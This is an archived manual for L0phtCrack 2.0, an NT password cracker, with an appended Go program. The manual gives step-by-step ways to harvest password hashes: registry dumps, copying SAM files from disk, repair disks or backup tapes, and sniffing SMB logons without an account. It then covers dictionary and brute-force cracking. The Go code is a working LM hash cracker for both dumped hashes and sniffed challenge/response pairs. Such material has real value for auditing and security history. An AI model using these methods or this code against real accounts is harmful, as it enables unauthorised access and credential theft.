l0phtcrack.readme.txt

Posted Aug 17, 1999


tags | cracker
SHA-256 | b8c416515d3b21d4af45ce1c05927d9be8ca421b0d4ffc1e80e3db4e3ad69e85

L0phtCrack 2.0 Manual

Introduction

L0phtCrack is designed to recover passwords for Windows NT. NT does not store the
actual passwords on an NT Domain Controller or Workstation. Instead it stores
cryptographic hashes of the passwords (a LAN Manager hash and an NT hash; see the
Technical Notes below). L0phtCrack takes those hashes and recovers the cleartext
passwords from them by hashing candidate passwords until one produces a match.

Passwords are recovered using two different methods. The first, a dictionary lookup
called dictionary cracking, uses a user-supplied dictionary file. The password hashes
for all of the words in the dictionary file are computed and compared against all of
the users' password hashes. When there is a match the password is known. This method
is extremely fast: thousands of users can be checked against a 100,000 word dictionary
file in just a few minutes on a PPro 200. The drawback is that it only finds passwords
that appear in the dictionary, that is, very simple ones.

The second method is brute force computation. This method takes a particular
character set, such as A-Z or A-Z plus 0-9, and computes the hash of every possible
password made up of those characters. It will always find the password if the
password is made up of the character set you have selected to test. The only
downside is time: it is very computation intensive, and the larger the character set
the longer it takes. The character set A-Z takes about 24 hours on a PPro 200; A-Z
plus 0-9 takes about 10 days.

Many of L0phtCrack's features are designed to make these long brute force
computations feasible. It takes advantage of multiprocessor machines and runs at
lower than normal priority, so you can use it on servers that have idle CPU. It can
save and restore its state during a brute force computation so that previously
computed work is not lost: L0phtCrack automatically saves its state every 5 minutes
in case of power loss or reboots. The saved .LC file is ASCII, so it can be inspected
over the network to check on progress.

Installation

Unzip the distribution archive, lc2exe.zip, into a directory. Create a shortcut to the
executable l0phtcrack.exe (or l0phtcrack95.exe for Win95) and you are done, unless
you want to use the network sniffing feature.

To do network sniffing you need to install an NDIS network driver. This driver will
only work on ethernet network devices. Go to the Network settings in the Control
Panel. Select the Protocols tab and press the Add... button. Press Have Disk... and
specify the directory where you installed L0phtCrack, which is where the Oemsetup.inf
file is. You will need to restart before the new driver takes effect.

Accessing the Password Hashes

Before the passwords can be computed you need to retrieve the password hashes.
There are three main methods to get them: from the registry directly, from a SAM file
on disk, or by sniffing the network.

Dumping From the Registry

If you have Administrator privileges you can get the password hashes using the
'Tools Dump Passwords from Registry' command. Specify a computer name or IP
address in the format \\computername or \\ipaddress. NT can be configured to
disallow remote access to the registry over the network, so you may need to be on
the local machine if this is the case. Microsoft introduced the SYSKEY utility in NT
4.0 SP3. If SYSKEY is running, the password hashes are encrypted and cannot be
retrieved in this manner.

If you are using a non-English language version of NT, your version may use a
different word for Administrators. If so, you need to modify a registry key to get Dump
Passwords to work. Run regedit.exe and edit the value of the key:

HKEY_CURRENT_USER\Software\LHI\L0phtCrack\AdminGroupName

Set it to your language version of 'Administrators'.

Extracting From a SAM File

The next method is new for L0phtCrack 2.0. You can retrieve the password hashes
from the SAM file on the hard disk, from an NT Emergency Repair Disk, or from a
backup tape. The NT registry is actually stored in several different files on the
system disk in the d:\winnt\system32\config directory.

These files cannot be accessed while NT is running, since they are opened
exclusively by the operating system. If you have physical access you can boot the
machine with a DOS floppy and use a program such as NTFSDOS
(http://www.ntinternals.com/ntfs20r.zip) to copy the SAM file from
d:\winnt\system32\config to a floppy disk. You can then use the L0phtCrack
command 'File Import SAM' to extract the password hashes from the SAM file.

Another place to find the SAM file that doesn't require rebooting the machine is
the d:\winnt\repair directory or an Emergency Repair floppy disk. Whenever a
repair disk is made, the contents of the SAM in the registry are saved and compressed
into the file 'sam._'. This file can be uncompressed with the command:

expand sam._ sam

The expanded SAM file can be imported into L0phtCrack.

The SAM file is also backed up onto tape when a full backup is performed. If you
have access to a backup tape you can restore the SAM file from
d:\winnt\system32\config to another machine and import it into L0phtCrack.

If SYSKEY from NT 4.0 SP3 is installed all of the SAM files are encrypted and cannot
be read by L0phtCrack.

Sniffing on the Network

If SYSKEY is installed and you have neither network access to the registry nor
physical access, don't fret. There is a third method for obtaining the password
hashes: network sniffing. Network sniffing requires that you be on the same physical
segment as the user or as the resource they are accessing. The sniffer, readsmb.exe,
included with L0phtCrack 2.0 will only work on Windows NT 4.0.

Follow the instructions in the Install section for installing the network driver
necessary for using the network sniffer.

The network sniffer is a command line program named readsmb.exe. Run it and
redirect its output to a file with the command:

readsmb > passwd

You probably want to let this run for a day or so to collect enough password hashes.
You can then open this file in L0phtCrack using the command File Open.

Readsmb.exe also has a verbose mode, enabled with the -v flag:

readsmb -v

This output is not formatted for opening with L0phtCrack but it may be useful to you.
On slow machines the -v option may cause readsmb to miss some packets, so it is
really just for debugging and exploring.

Computing Passwords

Once the password hashes are loaded into L0phtCrack you can start computing with
the command Tools Run. The default options first run a dictionary computation using
the default dictionary, words-english, that comes with the L0phtCrack distribution,
and then run a Brute Force computation using the default character set, A-Z.

L0phtCrack will save the state of the computation every 5 minutes to a .LC file.

The Tools Options menu command lets you select whether you want to do a
dictionary attack and/or a brute force attack.

Performance

Dictionary cracking is extremely fast. L0phtCrack running on a Pentium Pro 200
checked a password file with 100 passwords against a 8 Megabyte dictionary file in
under one minute.

Brute forcing is always an extremely CPU intensive operation. We have worked to
optimize this in L0phtCrack 2.0. L0phtCrack running on a Pentium Pro 200 checked a
password file with 10 passwords using the alpha character set (A-Z) in 26 hours.
L0phtCrack features a percentage done counter and a time remaining estimate so
you can gauge when the task will be complete.

L0phtCrack allows you to select one of 5 character sets to brute force passwords
that use more characters than A-Z. As the character set grows from 26 characters
to 68, the time to brute force a password grows steeply: the search covers every
string of 1 to 7 characters (one half of a LAN Manager hash), so the number of
iterations is the sum of c^n for n = 1..7, roughly c^7 for a set of c characters.

This chart illustrates the relative time for larger character sets.

Char set size   Iterations     Relative time
      26        8353082582       1.00
      36        80603140212      9.65
      46        4.45502E+11      53.33
      68        6.82333E+12      816.86

So if 26 characters takes 26 hours to complete, 36 characters (A-Z, 0-9) would take
about 250 hours, or 10.5 days. Of course this is the worst case scenario of the
password being 99999999999999. A password such as take2asp1r1n would probably be
computed in about 7 days.

Technical Notes - NT Server Challenge Sniffing

Here is a description of the challenge that takes place over the network when a
client, such as a Windows 95 machine, connects to an NT Server.

[assuming initial setup etc...]

                      8-byte "random" challenge
        Client  <-----------------------------------  Server

        OWF1 = LanMan OWF padded with 5 nulls
        OWF2 = NT OWF padded with 5 nulls
        resp = E(OWF1, Chal) || E(OWF2, Chal)

                      48-byte response (24-byte LanMan, 24-byte NT)
        Client  ----------------------------------->  Server

The client takes the OWF (all 16 bytes of it) and pads it with 5 nulls. It splits the
resulting 21 bytes into three 7-byte DES keys and encrypts the 8-byte challenge with
each in ECB mode. The resulting 24-byte string is sent to the server, which performs
the same operations on the OWF stored in its registry and compares the two 24-byte
strings. If they match, the user supplied the correct password.

What's cool about this? The challenge crosses the wire in the clear and the response
is a deterministic function of the challenge and the OWF, so you can take your sniffer
logs of NT logons and run the same dictionary and brute force attacks against the
captured challenge/response pairs to recover the plaintext passwords. This does not
require an account on the NT machine, nor does it require previous knowledge of the
ADMINISTRATOR password.

So even if you have installed Service Pack 3 and enabled SAM encryption, your
passwords are still vulnerable if they go over the network.
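The two attacks the Introduction describes (dictionary, then brute force over a character set) and the challenge/response exchange above, as an added Go example that is not part of L0phtCrack or this manual. It implements only the LAN Manager side: the LM OWF (uppercase, pad to 14 bytes, each 7-byte half used as a DES key to encrypt the fixed string "KGS!@#$%"), the 24-byte challenge response, a dictionary attack that works on either a dumped hash or a sniffed challenge/response pair, and a brute-force search over one 7-character half, which is why the iteration counts in the Performance table are sums of c^n for n = 1..7. The NT OWF (MD4 over the UTF-16LE password) is left out because Go's standard library has no MD4; the crack routines would apply to it unchanged. The dictionary, the sample passwords and the challenge bytes are constructed for this example, not taken from any real capture.

```go
package main

import (
	"bytes"
	"crypto/des"
	"fmt"
	"strings"
)

// One DES-ECB block under a 7-byte key; crypto/des wants 8 bytes, so each 7-bit
// group is widened with a trailing parity bit (left as 0, DES ignores it).
func desEncrypt(key7, block []byte) []byte {
	var k56 uint64
	for _, b := range key7 {
		k56 = k56<<8 | uint64(b)
	}
	key := make([]byte, 8)
	for i := range key {
		key[i] = byte(k56>>uint(49-7*i)) << 1
	}
	c, _ := des.NewCipher(key) // key is always 8 bytes, so no error is possible
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// Half of the LanMan OWF: up to 7 password bytes, null padded, used as a DES key
// to encrypt the fixed string "KGS!@#$%".
func lmHalf(chars []byte) []byte {
	k := make([]byte, 7)
	copy(k, chars)
	return desEncrypt(k, []byte("KGS!@#$%"))
}

// The full LanMan OWF: uppercase, pad or cut to 14 bytes, hash each 7-byte half
// on its own. This independence is what keeps brute force to 7 characters.
func lmHash(pw string) []byte {
	p := make([]byte, 14)
	copy(p, strings.ToUpper(pw))
	return append(lmHalf(p[:7]), lmHalf(p[7:])...)
}

// The 24-byte answer to the 8-byte challenge: the 16-byte OWF is padded with
// five nulls to 21 bytes, cut into three 7-byte DES keys, and each key encrypts
// the challenge. The NT half of the 48-byte response is built the same way.
func lmResponse(owf, chal []byte) []byte {
	k := make([]byte, 21)
	copy(k, owf)
	var r []byte
	for i := 0; i < 21; i += 7 {
		r = append(r, desEncrypt(k[i:i+7], chal)...)
	}
	return r
}

// Dictionary attack: hash each word, run derive over the hash (identity for a
// dumped hash, lmResponse for a sniffed response) and compare with the target.
func dictCrack(target []byte, words []string, derive func([]byte) []byte) (string, bool) {
	for _, w := range words {
		if bytes.Equal(derive(lmHash(w)), target) {
			return w, true
		}
	}
	return "", false
}

// Brute force of one LM half over every string of 1..maxLen chars from charset
// (maxLen at most 7); the cost is the sum of len(charset)^n for n = 1..maxLen.
func bruteHalf(target []byte, charset string, maxLen int) (string, bool) {
	var buf []byte
	var rec func() bool
	rec = func() bool {
		if len(buf) > 0 && bytes.Equal(lmHalf(buf), target) {
			return true
		}
		for i := 0; len(buf) < maxLen && i < len(charset); i++ {
			buf = append(buf, charset[i])
			if rec() {
				return true
			}
			buf = buf[:len(buf)-1]
		}
		return false
	}
	ok := rec()
	return string(buf), ok
}

func main() {
	// Constructed sample data (not a real capture): a dumped hash, a sniffed pair, a tiny dictionary.
	words := []string{"letmein", "welcome1", "password"}
	chal := []byte{1, 2, 3, 4, 5, 6, 7, 8}
	pw, _ := dictCrack(lmHash("password"), words, func(h []byte) []byte { return h })
	fmt.Println("dumped LM hash ->", pw)
	pw, _ = dictCrack(lmResponse(lmHash("welcome1"), chal), words, func(h []byte) []byte { return lmResponse(h, chal) })
	fmt.Println("sniffed challenge/response ->", pw)
	half, _ := bruteHalf(lmHash("zq")[:8], "ABCDEFGHIJKLMNOPQRSTUVWXYZ", 2)
	fmt.Println("brute force of first half over A-Z ->", half)
}
```

Because each LM half is hashed independently, a cracked first half tells you the password's first 7 characters even when the second half is still running, and a second half equal to the hash of seven nulls (aad3b435b51404ee) says the password is 7 characters or shorter. A match found through the LM hash only gives the uppercased password; the NT hash is what fixes the case.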

Acknowledgements

Special thanks go out to:

- Dmitry Andrianov for providing the SAMDUMP code for inclusion

- Eric Young (eay@mincom.oz.au) for much of the crypto lib code

- The MD4 algorithm is the "RSA Data Security, Inc. MD4 Message-Digest Algorithm";
this program is derived from the RSA Data Security, Inc. MD4 Message-Digest Algorithm

- Thank you anonymous for some LANMAN sorting code

- Hobbit@avian.org for all the cool ideas and bare feet. Especially for his monster
paper on CIFS problems.

- Jeremy Allison jra@cygnus.com - for the fantastic sleuthing with PWDump.

- tuebor@l0pht.com for some nice little code tips and general coolness.

- the people who did SAMBA for being nuts!

- the people who did libdes for being nuts!

- Tweety Fish for designing a rad logo for L0phtCrack